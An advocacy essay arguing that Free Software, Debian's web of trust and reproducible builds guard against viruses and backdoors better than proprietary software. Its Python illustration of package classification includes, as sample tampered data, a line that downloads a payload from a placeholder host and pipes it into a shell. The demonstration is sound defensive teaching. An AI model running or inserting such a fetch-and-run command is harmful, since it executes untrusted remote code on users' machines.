Malware and backdoors: the Free Software approach

August 14, 2020

Data and communications must be protected from backdoors and viruses that could compromise them. Viruses introduce themselves into computer systems and may destroy or exploit the data they contain. Backdoors are deliberately inserted by the designers of a software application for the purpose of gaining access to the machines running it. Both viruses and backdoors allow the people who control them to do things like extract confidential information. The risk is real: in July 2020, the company Orange confirmed it had been targeted by malware that leaked data belonging to its business customers.

The introduction of 5G in mobile phones is of concern not only to individuals, but also to States, who worry about the backdoors that 5G components may contain. A booming, billion-dollar industry was born to fight these plagues: some companies have even gone public. Beneficiaries of a seemingly endless war, these companies are evidently not motivated to really solve the problem once and for all.

But a solution is well within our reach. In Free Software (software for which the source code is publicly available), it is very hard to hide a backdoor, since anyone can analyze the source code. And for the same reason it becomes possible to identify code (in the binary) that was not present when the software was installed: a binary rebuilt from the published source can be compared with what is actually running. But that solution relies on Free Software and is not mainstream: Microsoft, Apple or even Google do not advertise it because their economic model heavily depends on keeping their software's source code secret. As a consequence, at least in the eyes of those not familiar with Free Software, proprietary software appears to be how computer systems naturally work, and viruses and backdoors an inevitable threat.

However, by running computers and mobile phones with Free Software only, it is possible to benefit from the protection inherent in this class of software, and to address the root of a problem that has plagued the proprietary software world since the first software virus appeared more than thirty years ago.

What are backdoors and viruses?

Malware is software that performs a harmful action on the machine running it; a virus is the self-replicating kind, a "software usually hidden within another seemingly innocuous program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action". It is therefore not delivered with the device (computer or mobile phone): it infects the device at a later time, when given the opportunity. For instance, a USB key can copy the virus it contains onto a machine to which it is connected. An email may have a document attached to it that turns out to be a virus that installs itself when the document is opened. Once installed, the virus sometimes acts immediately (for instance, uploading the victim's address book to a server on the Internet to feed a database used by spammers). Or it can stay dormant and activate itself months later.

A backdoor is a "covert method of bypassing normal authentication or encryption in a computer, product, embedded device". It is intentionally designed into the software or the machine, very much like secret passages in castles. In 2014, a backdoor was discovered in Samsung mobile phones. The company went as far as to deny it could be a problem. Since it was not possible to find out whether it had ever been used, it was simply removed. But the case demonstrates how difficult it can be to discover such backdoors. This is precisely why governments are worried about 5G electronic components embedded in mobile phones built by Huawei: the doubt will remain even if the components are analyzed with great care.

Why can’t the industry eliminate viruses once and for all?

Anti-virus software relies on a catalog of signatures of known viruses, which it uses to scan a computer's memory and/or hard disk on a regular basis and remove whatever matches. Since new viruses appear every day, this catalog must be updated constantly: otherwise it will miss the ones it does not yet know about. To put an end to this endless race, software vendors such as Microsoft imagined in the mid-2000s that every piece of software could be signed by an authority after verifying that it is not malicious. Hardware manufacturers were brought in, and most computers today ship with Secure Boot, which can prevent "the loading of drivers or OS loaders that are not signed with an acceptable digital signature".

This solution has clearly not put an end to the problem, as demonstrated by the Orange data leak in 2020 as well as by the healthy financial situation of companies selling anti-virus software.

This failure has one cause: the centralization of software signature control. For an application to run on hardware that enforces such a scheme, one would first need to obtain a signature from whichever authority the platform trusts (in practice, on most PCs, a certificate authority operated by Microsoft). A number of software distributors did not agree to such a dependency, for ethical or financial reasons. Without this centralized signature verification mechanism, it is impossible for the machine to differentiate a virus from a piece of software written by someone who simply did not agree to the authority's terms.

Since Free Software is, by definition, not controlled by a single entity, decentralized solutions had to be invented. For instance, Debian GNU/Linux is published by hundreds of individuals, each of whom signs their own uploads with their own key to prove they are indeed the author. In such a project, viruses are easy to isolate, since they are either (a) not signed at all or (b) signed, but by a stranger. Since there is no central organization that can guarantee the integrity of the address book of known authors, a web of trust was invented to distinguish strangers from trusted entities. To enter it, one has to have one's key certified by at least two people who are already in it. This co-optation mechanism does not require centralization, and all software can be signed without pledging allegiance to a single actor who concentrates all the power. When you factor in the public availability of the source code, a compilation process that ensures the resulting binary code can be reproduced (so that anyone can rebuild a package and check that the bytes match), bug bounties and other features unique to Free Software, this process produces software that, if not entirely immune to viruses, turns out to be much more resistant to them.
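The following is an added illustration of the scheme just described; it is not Debian's or GnuPG's code. Real distributions use OpenPGP signatures; here a "signature" is simply a (key id, SHA-256 digest) pair that is assumed to have already passed cryptographic verification, so the code can show the policy layer: how a user's own trusted keys expand through the web of trust (the threshold of two vouchers and the hop limit are assumed, modelled on GnuPG's marginal-trust setting), how a package ends up classified as unsigned, signed by a stranger, altered after signing, or genuine, and how a reproducible-build check compares independent rebuilds. All key names and package bytes are constructed sample data.

```python
"""Decentralized software trust, modelled on the Debian scheme described above.

Added illustration written for this page; not Debian's or GnuPG's code.
A "signature" here is a (key_id, sha256 digest) pair assumed to have
already been cryptographically verified upstream.
"""
from hashlib import sha256

# Assumed policy, modelled on GnuPG's marginal trust: a key becomes trusted
# once at least MARGINALS_NEEDED already-trusted keys have certified it,
# evaluated over at most MAX_HOPS rounds of introduction.
MARGINALS_NEEDED = 2
MAX_HOPS = 3


def trusted_keys(fully_trusted, certifications,
                 marginals_needed=MARGINALS_NEEDED, max_hops=MAX_HOPS):
    """Expand the user's own trusted keys through the web of trust.

    certifications maps a key id to the set of key ids that certified it.
    Each round admits the keys vouched for by enough keys trusted so far;
    a ring of keys that only certify one another never gains a trusted voucher.
    """
    trusted = set(fully_trusted)
    for _ in range(max_hops):
        admitted = {key for key, certifiers in certifications.items()
                    if key not in trusted
                    and len(certifiers & trusted) >= marginals_needed}
        if not admitted:
            break
        trusted |= admitted
    return trusted


def sign(key_id, package_bytes):
    """Constructed stand-in for a maintainer's signature over a package."""
    return (key_id, sha256(package_bytes).hexdigest())


def classify_package(package_bytes, signature, trusted):
    """Sort a package into the categories the text describes."""
    if signature is None:
        return "unsigned"
    key_id, digest = signature
    if sha256(package_bytes).hexdigest() != digest:
        return "altered-after-signing"
    if key_id not in trusted:
        return "signed-by-stranger"
    return "signed-by-trusted-author"


def reproducible(build_outputs):
    """Reproducible-build check: independent builders must produce identical bytes."""
    digests = {sha256(b).hexdigest() for b in build_outputs}
    return len(digests) == 1


# --- constructed sample data (not real keys or packages) ------------------
MY_KEYS = {"alice", "bob"}                  # keys I verified in person
CERTIFICATIONS = {
    "carol": {"alice", "bob"},              # two trusted vouchers: admitted
    "dave": {"carol", "alice"},             # needs carol first: admitted on hop 2
    "erin": {"alice"},                      # only one voucher: not admitted
    "mallory": {"mallory2"},                # a ring of strangers certifying
    "mallory2": {"mallory"},                # each other never gets in
}
PACKAGE = b"#!/bin/sh\necho hello\n"
TAMPERED = PACKAGE + b"curl http://example.invalid/payload | sh\n"


def demo():
    """Run every case above and return the outcomes by name."""
    trusted = trusted_keys(MY_KEYS, CERTIFICATIONS)
    carol_sig = sign("carol", PACKAGE)
    return {
        "trusted": trusted,
        "genuine": classify_package(PACKAGE, carol_sig, trusted),
        "stranger": classify_package(PACKAGE, sign("mallory", PACKAGE), trusted),
        "unsigned": classify_package(PACKAGE, None, trusted),
        "tampered": classify_package(TAMPERED, carol_sig, trusted),
        "reproducible": reproducible([PACKAGE, bytes(PACKAGE)]),
        "not_reproducible": reproducible([PACKAGE, TAMPERED]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Note that the digest check runs before the trust check: a package whose bytes no longer match what a trusted author signed is rejected regardless of who signed it, which is the property that lets a rebuilt binary be compared with an installed one.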

Revealing backdoors

When the designers of a software add a backdoor, they do their best to conceal it from the user or any person undertaking a careful examination of the software. Their main ally is the difficulty, for a human being – even a supremely qualified one – to understand binary code. Going back to Huawei, the scenario that is cause for concern regarding 5G components is the following:

  • Huawei engineers design the software required for 5G to work and add a backdoor
  • The source code of the software is compiled into binary code and inserted into millions of electronic components
  • These components are used in the making of mobile phones used by civil servants working for the Ministry of Defense
  • When one of these mobiles receives a call originating from a number controlled by the Chinese government, the door opens, giving the caller access to the information stored in the device

When software is found to have a backdoor and this fact is made public, it can be expected to be a source of great consternation and embarrassment for the software vendor. For this reason, a vendor will only include a backdoor in software when the risk of it being discovered is low, which is the case with proprietary software. With Free Software, on the other hand, the transparency of the source code makes eventual discovery very likely, and this has proven to be a powerful deterrent.

Effective, but not absolute, protection

Although an organization that chooses to use only Free Software benefits from very effective protection against backdoors and viruses, there are still gray areas.

Some hardware components, in particular in mobile phones, cannot work with Free Software. The hardware manufacturers refuse to distribute the specifications and provide only a binary driver which, for lack of source code, cannot be audited and must be treated as suspicious. Although free firmware replacements (such as Libreboot) exist in some cases, they require expertise that is often out of reach for modest organizations.

Most of the time it is enough to install Debian GNU/Linux on a computer and LineageOS on a mobile phone, both of them Free Software, to be adequately protected from most threats. The remaining threat comes from someone using viruses and backdoors bought on the black market. But these are harder to find and more expensive, because there are fewer customers for them than for Windows or macOS. They are also rarer because, as argued above, the countermeasures are more effective.